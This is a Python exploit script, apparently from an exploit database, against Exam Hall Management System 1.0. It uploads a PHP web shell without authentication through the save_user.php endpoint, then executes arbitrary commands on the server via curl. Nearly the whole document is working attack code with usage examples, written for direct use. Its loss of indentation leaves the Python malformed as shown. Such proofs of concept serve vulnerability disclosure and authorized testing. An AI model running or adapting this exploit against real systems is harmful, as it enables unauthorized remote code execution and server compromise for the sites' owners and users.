# Exploit Title: Exam Hall Management System 1.0 - Unrestricted File Upload + RCE (Unauthenticated)
# Exploit Author: Davide 'yth1n' Bianchin
# Contacts: davide dot bianchin at dedagroup dot it
# Original PoC: https://exploit-db.com/exploits/50103
# Date: 06.07.2021
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14205/exam-hall-management-system-full-source-code-using-phpmysql.html
# Version: 1.0
# Tested on: Kali Linux
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder
import os
import sys
import string
import random
import time
host = 'localhost' #CHANGETHIS
path = 'SourceCode' #CHANGETHIS
url = 'http://'+host+'/'+path+'/pages/save_user.php'
def id_generator(size=6, chars=string.ascii_lowercase):
return ''.join(random.choice(chars) for _ in range(size))+'.php'
if len(sys.argv) == 1:
print("#########")
print("Usage: python3 examhallrce.py command")
print("Usage: Use the char + to concatenate commands")
print("Example: python3 examhallrce.py whoami")
print("Example: python3 examhallrce.py ls+-la")
print("#########")
exit()
filename = id_generator()
print("Generated "+filename+ " file..")
time.sleep(2)
print("Uploading file..")
time.sleep(2)
def reverse():
command = sys.argv[1]
multipart_data = MultipartEncoder({
'image': (filename, '<?php system($_GET["cmd"]); ?>', 'application/octet-stream'),
'btn_save': ''
})
r = requests.post(url, data=multipart_data, headers={'Content-Type':multipart_data.content_type})
endpoint = 'http://'+host+'/'+path+'/uploadImage/Profile/'+filename+''
urlo = 'http://'+host+'/'+path+'/uploadImage/Profile/'+filename+'?cmd='+command+''
print("Success, file correctly uploaded at: " +endpoint+ "")
time.sleep(1)
print("Executing command in 1 seconds:\n")
time.sleep(1)
os.system("curl -X GET "+urlo+"")
reverse()
